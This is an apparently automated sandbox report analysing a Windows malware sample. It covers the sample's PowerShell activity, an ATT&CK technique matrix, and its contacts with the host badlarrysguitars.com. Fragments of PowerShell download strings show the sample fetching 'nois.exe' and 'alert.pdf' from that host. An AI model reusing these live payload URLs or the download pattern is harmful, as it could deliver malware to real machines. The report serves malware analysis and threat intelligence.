Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
PowerShell
1
DLL Side-Loading
11
Process Injection
11
Masquerading
OS Credential Dumping11
Security Software Discovery
Remote Services1
Archive Collected Data
11
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
31
Virtualization/Sandbox Evasion
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
Process Injection
Security Account Manager31
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets2
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials21
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1570132 Sample: lg1wwLsmCX.exe Startdate: 06/12/2024 Architecture: WINDOWS Score: 52 34 badlarrysguitars.com 2->34 36 x1.i.lencr.org 2->36 38 bg.microsoft.map.fastly.net 2->38 44 Machine Learning detection for sample 2->44 46 AI detected suspicious sample 2->46 10 lg1wwLsmCX.exe 2->10         started        13 svchost.exe 1 1 2->13         started        signatures3 process4 dnsIp5 48 Suspicious powershell command line found 10->48 16 powershell.exe 17 20 10->16         started        19 powershell.exe 16 10->19         started        40 127.0.0.1 unknown unknown 13->40 signatures6 process7 dnsIp8 32 badlarrysguitars.com 101.99.75.174, 443, 49718, 49768 SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY Malaysia 16->32 21 Acrobat.exe 77 16->21         started        23 conhost.exe 16->23         started        25 conhost.exe 19->25         started        process9 process10 27 AcroCEF.exe 108 21->27         started        process11 29 AcroCEF.exe 6 27->29         started        dnsIp12 42 50.16.47.176, 443, 49758, 49767 AMAZON-AESUS United States 29->42

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
lg1wwLsmCX.exe8%ReversingLabs
lg1wwLsmCX.exe100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://badlarrysguitars.com/share/alert.pdfll0%Avira URL Cloudsafe
https://www.adobe.co0%Avira URL Cloudsafe
https://badlarrysguitars.com/share/alert.pdf-OutFile(Join-Path(0%Avira URL Cloudsafe
https://badlarrysguitars.com/share/alert.pdf0%Avira URL Cloudsafe
https://badlarrysguitars.com/private/nois.exej0%Avira URL Cloudsafe
https://badlarrysguitars.com/private/nois.exe-OutFile(Join-Path(0%Avira URL Cloudsafe
https://badlarrysguitars.com0%Avira URL Cloudsafe
https://badlarrysguitars.com/private/nois.exe0%Avira URL Cloudsafe
https://go.microsoft.co0%Avira URL Cloudsafe
http://badlarrysguitars.com0%Avira URL Cloudsafe
http://www.microsoft.coc0%Avira URL Cloudsafe
https://badlarrysguitars.com/pri0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.210.172
truefalse
    high
    badlarrysguitars.com
    101.99.75.174
    truetrue
      unknown
      s-part-0035.t-0009.t-msedge.net
      13.107.246.63
      truefalse
        high
        x1.i.lencr.org
        unknown
        unknownfalse
          high
          NameMaliciousAntivirus DetectionReputation
          https://badlarrysguitars.com/share/alert.pdftrue
          • Avira URL Cloud: safe
          unknown
          https://badlarrysguitars.com/private/nois.exetrue
          • Avira URL Cloud: safe
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1493599643.0000024F901B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1419880884.0000024F819F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1493599643.0000024F90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1622100254.0000022EB21F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1622100254.0000022EB233A000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.5.drfalse
              high
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000D.00000002.1561850216.0000022EA23B3000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://go.microsoft.copowershell.exe, 00000001.00000002.1504426551.0000024FEBD0B000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000D.00000002.1561850216.0000022EA23B3000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://go.micropowershell.exe, 00000001.00000002.1419880884.0000024F81193000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1561850216.0000022EA3641000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://contoso.com/Licensepowershell.exe, 0000000D.00000002.1622100254.0000022EB233A000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://badlarrysguitars.com/share/alert.pdfllpowershell.exe, 00000001.00000002.1506677308.0000024FEBF5E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://contoso.com/Iconpowershell.exe, 0000000D.00000002.1622100254.0000022EB233A000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://crl.ver)svchost.exe, 00000006.00000002.2613139359.000001EC4FA8C000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://badlarrysguitars.com/private/nois.exejpowershell.exe, 0000000D.00000002.1559532601.0000022EA02D8000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://badlarrysguitars.com/private/nois.exe-OutFile(Join-Path(powershell.exe, 0000000D.00000002.1559532601.0000022EA0250000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1632473413.0000022EBA4B3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1629139480.0000022EBA260000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1560571180.0000022EA04E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1561049909.0000022EA1C90000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://badlarrysguitars.com/share/alert.pdf-OutFile(Join-Path(powershell.exe, 00000001.00000002.1501054711.0000024FE9CC8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1502637123.0000024FE9F50000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://github.com/Pester/Pesterpowershell.exe, 0000000D.00000002.1561850216.0000022EA23B3000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://badlarrysguitars.compowershell.exe, 00000001.00000002.1419880884.0000024F8169C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1561850216.0000022EA3818000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            https://www.adobe.coReaderMessages.4.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://badlarrysguitars.compowershell.exe, 00000001.00000002.1419880884.0000024F8192E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1561850216.0000022EA3AAB000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://badlarrysguitars.com/pripowershell.exe, 0000000D.00000002.1561850216.0000022EA3AD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1561850216.0000022EA3C09000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            https://g.live.com/odclientsettings/Prod-C:edb.log.6.drfalse
                              high
                              https://contoso.com/powershell.exe, 0000000D.00000002.1622100254.0000022EB233A000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://g.live.com/odclientsettings/ProdV2-C:svchost.exe, 00000006.00000003.1430730460.000001EC4FC00000.00000004.00000800.00020000.00000000.sdmp, edb.log.6.drfalse
                                  high
                                  https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1493599643.0000024F901B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1419880884.0000024F819F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1493599643.0000024F90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1622100254.0000022EB21F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1622100254.0000022EB233A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://aka.ms/pscore68powershell.exe, 00000001.00000002.1419880884.0000024F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1561850216.0000022EA2181000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1419880884.0000024F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1561850216.0000022EA2181000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.microsoft.cocpowershell.exe, 00000001.00000002.1506355445.0000024FEBE70000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IPDomainCountryFlagASNASN NameMalicious
                                        50.16.47.176
                                        unknownUnited States
                                        14618AMAZON-AESUSfalse
                                        101.99.75.174
                                        badlarrysguitars.comMalaysia
                                        45839SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMYtrue
                                        IP
                                        127.0.0.1
                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1570132
                                        Start date and time:2024-12-06 15:45:36 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 5m 37s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:18
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:lg1wwLsmCX.exe
                                        renamed because original name is a hash value
                                        Original Sample Name:aa278fedf75ca629997113488d789e91f73a275575c22194c7bf7d59b30c9bc9.exe
                                        Detection:MAL
                                        Classification:mal52.winEXE@23/63@3/3
                                        EGA Information:Failed
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 9
                                        • Number of non-executed functions: 4
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                        • Excluded IPs from analysis (whitelisted): 162.159.61.3, 172.64.41.3, 23.218.208.137, 23.218.208.109, 23.195.39.65, 199.232.210.172, 2.19.198.27, 23.32.239.56, 2.20.40.170, 2.19.126.143, 2.19.126.149, 23.193.114.8, 23.193.114.34, 2.20.68.201, 2.20.68.210
                                        • Excluded domains from analysis (whitelisted): chrome.cloudflare-dns.com, e4578.dscg.akamaiedge.net, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, e4578.dscb.akamaiedge.net, otelrules.afd.azureedge.net, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, ssl.adobe.com.edgekey.net, armmf.adobe.com, azureedge-t-prod.trafficmanager.net, geo2.adobe.com
                                        • Execution Graph export aborted for target lg1wwLsmCX.exe, PID 7660 because it is empty
                                        • Execution Graph export aborted for target powershell.exe, PID 1912 because it is empty
                                        • Execution Graph export aborted for target powershell.exe, PID 7676 because it is empty
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                        • VT rate limit hit for: lg1wwLsmCX.exe
                                        TimeTypeDescription
                                        09:46:31API Interceptor63x Sleep call for process: powershell.exe modified
                                        09:46:36API Interceptor2x Sleep call for process: svchost.exe modified
                                        09:46:46API Interceptor2x Sleep call for process: AcroCEF.exe modified
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        50.16.47.176phish_alert_sp2_2.0.0.0.emlGet hashmaliciousUnknownBrowse
                                          Belegdetails Nr378-938-027181-PDF.htmlGet hashmaliciousWinSearchAbuseBrowse
                                            Job Description.lnk (2).download.lnkGet hashmaliciousDucktailBrowse
                                              FACTURE NON PAYEE.pdfGet hashmaliciousUnknownBrowse
                                                Notice_Of_New_Remittance.pdfGet hashmaliciousUnknownBrowse
                                                  Settlement_Legal_Transcription.pdfGet hashmaliciousHTMLPhisherBrowse
                                                    https://acrobat.adobe.com/id/urn:aaid:sc:EU:98ca4a25-984a-4511-9eb1-b7e6c5c56a12Get hashmaliciousHTMLPhisherBrowse
                                                      REMITTANCE-NOTICE-For-Norriselectricxslx.pdfGet hashmaliciousUnknownBrowse
                                                        2855dffd-7888-4713-9478-2bbfa22fab70.emlGet hashmaliciousUnknownBrowse
                                                          LisectAVT_2403002B_218.exeGet hashmaliciousUnknownBrowse
                                                            101.99.75.174IFhqcKaIol.lnkGet hashmaliciousUnknownBrowse
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              badlarrysguitars.comIFhqcKaIol.lnkGet hashmaliciousUnknownBrowse
                                                              • 101.99.75.174
                                                              bg.microsoft.map.fastly.netIFhqcKaIol.lnkGet hashmaliciousUnknownBrowse
                                                              • 199.232.214.172
                                                              17334905466c073176eadfc4a4d1af620c5aa97d12d1156570ede93d276f9fa6d51fffb6c5778.dat-decoded.exeGet hashmaliciousAsyncRATBrowse
                                                              • 199.232.210.172
                                                              phish_alert_sp2_2.0.0.0.emlGet hashmaliciousUnknownBrowse
                                                              • 199.232.210.172
                                                              1733479268d0423578683b481c87d2b90a74213612e8837faf7f066c8e81ec92f9b2658c65965.dat-decoded.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                                                              • 199.232.210.172
                                                              1733479274b6398afce8a86557af12b8f232b1cc4638f7df1d6de31554c2e013c23277a5b9785.dat-decoded.exeGet hashmaliciousPureCrypterBrowse
                                                              • 199.232.214.172
                                                              mjf2ERXdI5.exeGet hashmaliciousUnknownBrowse
                                                              • 199.232.210.172
                                                              16547.jsGet hashmaliciousMassLogger RATBrowse
                                                              • 199.232.214.172
                                                              Scan_03774843.pdfGet hashmaliciousUnknownBrowse
                                                              • 199.232.210.172
                                                              dtkB4s3lqj.lnkGet hashmaliciousUnknownBrowse
                                                              • 199.232.210.172
                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                              • 199.232.214.172
                                                              s-part-0035.t-0009.t-msedge.nethttps://dsbemcm.r.us-east-1.awstrack.me/L0/https:%2F%2Fmondialrelay-fr.pdfing.ai%2F/1/0100019399661370-1ce77c65-1b81-4233-8a20-5a39fd0f0317-000000/J1Yr9vKfHbZhazSj6gj8UC7ow80=403Get hashmaliciousUnknownBrowse
                                                              • 13.107.246.63
                                                              x6r8nO2qzQ.dllGet hashmaliciousUnknownBrowse
                                                              • 13.107.246.63
                                                              kLSN6eFPVL.exeGet hashmaliciousUnknownBrowse
                                                              • 13.107.246.63
                                                              #U25b6#Ufe0fPlayVoiceMessage9266.emlGet hashmaliciousUnknownBrowse
                                                              • 13.107.246.63
                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                              • 13.107.246.63
                                                              1733490739e5e30edcf0680d8a10de07d13f0f9a2284bc87bf8b4af988e0742c1432ac615d942.dat-decoded.exeGet hashmaliciousNjratBrowse
                                                              • 13.107.246.63
                                                              17334905466c073176eadfc4a4d1af620c5aa97d12d1156570ede93d276f9fa6d51fffb6c5778.dat-decoded.exeGet hashmaliciousAsyncRATBrowse
                                                              • 13.107.246.63
                                                              https://jet.cloudhostingworks.com/CetQr/Get hashmaliciousHTMLPhisherBrowse
                                                              • 13.107.246.63
                                                              Document_PDF.vbsGet hashmaliciousFormBookBrowse
                                                              • 13.107.246.63
                                                              8AbMCL2dxM.exeGet hashmaliciousRCRU64, TrojanRansomBrowse
                                                              • 13.107.246.63
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMYIFhqcKaIol.lnkGet hashmaliciousUnknownBrowse
                                                              • 101.99.75.174
                                                              Scan_03774843.pdfGet hashmaliciousUnknownBrowse
                                                              • 101.99.77.51
                                                              https://oyatsu-jikan.org/#Z2FyeXRocm93JG5hdGlvbmFsdHViZXN1cHBseS5jb20=Get hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                                              • 101.99.88.67
                                                              442.docx.exeGet hashmaliciousRMSRemoteAdminBrowse
                                                              • 111.90.147.125
                                                              442.docx.exeGet hashmaliciousRMSRemoteAdminBrowse
                                                              • 111.90.147.125
                                                              442.docx.exeGet hashmaliciousRMSRemoteAdminBrowse
                                                              • 111.90.147.125
                                                              442.docx.exeGet hashmaliciousRMSRemoteAdminBrowse
                                                              • 111.90.147.125
                                                              Vendor Agreement Ready for Your Signature November 22 2024 at 084923 PM.msgGet hashmaliciousHTMLPhisherBrowse
                                                              • 101.99.75.104
                                                              http://amz-account-unlock-dashboard4.duckdns.orgGet hashmaliciousUnknownBrowse
                                                              • 111.90.149.151
                                                              https://texasbarcle.com/CLE/AAGateway.asp?lRefID=19203&sURL=https://famezik.com/#Zi5waWNhc3NvJG1hcmxhdGFua2Vycy5ncg==Get hashmaliciousUnknownBrowse
                                                              • 111.90.141.53
                                                              AMAZON-AESUShttps://dsbemcm.r.us-east-1.awstrack.me/L0/https:%2F%2Fmondialrelay-fr.pdfing.ai%2F/1/0100019399661370-1ce77c65-1b81-4233-8a20-5a39fd0f0317-000000/J1Yr9vKfHbZhazSj6gj8UC7ow80=403Get hashmaliciousUnknownBrowse
                                                              • 3.232.156.127
                                                              IFhqcKaIol.lnkGet hashmaliciousUnknownBrowse
                                                              • 3.219.243.226
                                                              jew.sh4.elfGet hashmaliciousUnknownBrowse
                                                              • 44.221.131.20
                                                              file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                              • 44.196.3.45
                                                              jew.mips.elfGet hashmaliciousUnknownBrowse
                                                              • 54.42.218.193
                                                              file.exeGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                              • 44.196.3.45
                                                              https://us-api.mimecast.com.kb4.io/XWko4Q0hGOG85d2pSNGFBUW1UaEJSL09QUThzR2hrYWl3UGh4aEFVNkQ0dW1jU0FrdnhwRFB2clh1VmRINlRhSTJXNkM0N2NiS0J6WWlVRENjUVlPSWZYbk9xUkNaRDNGSjR3OU1Jd2RSdlJKL0k2cjZWV0ozK1BLRWRrZWJucElFUGVXcFpkM2hlOXluYlErY01WYkRnNmtzUldXNlJEcmIvN0Z0WVNMOHNobW5lMjVGcEdENDA0TWZNblZTWFVuRUp3PS0taC91cHJQRm5XdmFVejBTdC0tWVNTU2ZrYnF5clZ0ZndVU0tiNHIzUT09?cid=2313358952Get hashmaliciousKnowBe4Browse
                                                              • 54.85.18.81
                                                              file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                              • 34.224.200.202
                                                              https://i.postimg.cc/y6hBTtv7/png-Hand-SAward.pngGet hashmaliciousHTMLPhisherBrowse
                                                              • 54.224.154.88
                                                              file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                              • 44.196.3.45
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              3b5074b1b5d032e5620f69f9f700ff0eIFhqcKaIol.lnkGet hashmaliciousUnknownBrowse
                                                              • 101.99.75.174
                                                              JSWunwO4rS.lnkGet hashmaliciousLummaC StealerBrowse
                                                              • 101.99.75.174
                                                              7p5nITtglJ.lnkGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                              • 101.99.75.174
                                                              kjshdkfgjsdg.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                              • 101.99.75.174
                                                              https://t.ly/alBFXGet hashmaliciousUnknownBrowse
                                                              • 101.99.75.174
                                                              QD40FIJ8QK.lnkGet hashmaliciousUnknownBrowse
                                                              • 101.99.75.174
                                                              TEKL_F _STE_I Unilever San ve Tic Trk A__PDF.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 101.99.75.174
                                                              AS6xKJzYJT.exeGet hashmaliciousPython Stealer, XenoRATBrowse
                                                              • 101.99.75.174
                                                              yG53aU3gGm.exeGet hashmaliciousUnknownBrowse
                                                              • 101.99.75.174
                                                              No context
                                                              Process:C:\Windows\System32\svchost.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1310720
                                                              Entropy (8bit):0.4932262607720992
                                                              Encrypted:false
                                                              SSDEEP:1536:cJNnm0h6QV70hV40h5RJkS6SNJNJbSMeCXhtvKTeYYJyNtEBRDna33JnbgY1ZtaU:cJhXC9lHmutpJyiRDeJ/aUKrDgnm2
                                                              MD5:670622AFBC7CC899FB77A45254EAD470
                                                              SHA1:6D60CDCE86F969A60AF70FB1E14473FD1124EA63
                                                              SHA-256:01EAB1E0E890784D88F3087B143A26A32062633998C31E23D373344CB4072823
